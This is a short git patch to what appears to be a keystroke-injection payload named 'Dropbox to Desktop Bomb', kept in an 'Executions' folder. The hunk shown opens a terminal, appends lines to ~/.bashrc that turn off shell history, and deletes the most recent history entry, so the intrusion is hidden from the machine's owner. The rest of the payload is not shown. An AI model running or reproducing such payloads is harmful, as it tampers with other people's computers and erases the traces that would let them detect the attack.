From a819e84d4a17fd1664383c5082ca4b34f04cc7da Mon Sep 17 00:00:00 2001 From: Narsty Date: Fri, 23 Jun 2023 20:07:53 -0500 Subject: [PATCH] Update Dropbox to Desktop Bomb --- Executions/Dropbox to Desktop Bomb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Executions/Dropbox to Desktop Bomb b/Executions/Dropbox to Desktop Bomb index 678587a..49ba7f8 100644 --- a/Executions/Dropbox to Desktop Bomb +++ b/Executions/Dropbox to Desktop Bomb @@ -23,8 +23,7 @@ STRING terminal DELAY 500 ENTER DELAY 500 -STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash -history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') DELAY 500 ENTER DELAY 1000